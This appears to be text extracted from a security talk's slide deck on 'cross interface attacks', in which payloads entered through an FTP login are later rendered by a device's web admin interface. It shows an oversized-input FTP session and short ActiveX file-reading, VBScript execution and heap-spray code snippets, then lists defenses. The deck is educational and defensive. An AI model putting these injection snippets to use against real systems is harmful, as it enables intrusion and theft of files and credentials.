Post on 21-Jun-2015
description
CROSS INTERFACE ATTACK
Piyush MittalSecurity Compass
Introduction
When 1 interface is used to attack the other interface.
Different from XSS
XSS - Entry point is from web to web
CIA - Entry point is from backend login console to web interface
CIA Characteristics
• Exploits the default nature of FTP /Telnet Protocol• Admin interfaces : { Web, FTP, Telnet}• Logging module running as root• DOM and HTML rendered as dynamic content• Attacks are persistent in nature• Hardware devices – firewalls, disk stations,
management systems etc.
Truth About FTP
• The default design of FTP allows the acceptance of both username and password prior to the authentication process and complete verification.
• No check on no of login attempts.
• No check on type of characters.
Old Buffer Trick• root@redux$ ftp example.com• Connected to example.com.• 220 Disk Station FTP server at DiskStation ready.• User (example.com:(none)):• AAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAAAA• 331 Password required for• AAAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAAA• AAAAAAAAAAAAAAAAAAAAAAAAAA.• Password:• 530 Login incorrect.• Login failed.
Design of the Application
FTP LOGININTERFACE
I
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
FTPAuthenticationModule
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
FTPAuthenticationModule
FTP Logging Module
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
FTPAuthenticationModule
FTP Logging Module
FTP Logging module run as root or administrator
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
FTPAuthenticationModule
FTP Logging Module
Web Interface
FTP Logging module run as root or administrator
Design of the Application
FTP LOGININTERFACE
I
Inject Payload
FTPAuthenticationModule
FTP Logging Module
Web Interface
Unencoded/Unfiltered HTML rendering
FTP Logging module run as root or administrator
THREATS
• Information Stealing
Sample code
THREATS
Cookie Stealing
THREATS
• Malware Infections - Executing payloads to conduct Drive by Download Attacks
Sample code
THREATS
Drive by Download Attack
THREATS
• CSRF
Sample code
• Tuning Network device into attack pot
Advanced Code Injections
• Active X code execution
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
XFile = fso.GetFile(”c:/business/secret.txt”);stream = XFile.OpenAsTextStream(1, 0);var content = stream.ReadAll();
Advanced Code Injections
• VBScript code execution
<object classid=’clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8’ id=’target’ ></object> <script language=’vbscript’>arg1=”c:/WINDOWS/system32/calc.exe”target.Exec arg1</script>
Advanced Code Injections
• Heap Spray code execution
var shellcode = unescape(””);var heap block=unescape(”%u0a0a%u0a0a”);var nop sled= unescape(”%u09090%u09090%u09090”)do {heap_block += heap_block;} while (heap_block.length < xxxx)var memory = new Array();for (ret=0; ret <100; ret++){ memory[ret] += heap_block+nop_sled+shellcode; }
Advanced Code Injections
• AJAX code execution
DEFENSE
• A whitelist approach should be followed at the protocol level to reduce the impact of exploitation.
• The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.
• The logging process should not run as administrator or root user.
• The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content.
• The content should be sniffed to avoid the usage of malicious input thereby defining the Content-Type appropriately.
???????
When In doubt, its better to ask
References• http://www.google.co.in/search?q=http%3A%2F%2Fmilw0rm.com
%2Fexploits%2F6476&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#sclient=psy-ab&hl=en&client=firefox-a&rls=org.mozilla:en-US%3Aofficial&source=hp&q=cross+interface+attack&pbx=1&oq=cross+interface+attack&aq=f&aqi=&aql=&gs_sm=e&gs_upl=37279l38938l11l40023l2l2l0l0l0l0l268l492l2-2l2l0&bav=on.2,or.r_gc.r_pw.&fp=a0ba24de15e40bac&biw=1366&bih=558
• http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2453• http://www.securityfocus.com/archive/1/archive/1/513970/100/0/
threaded
THANKS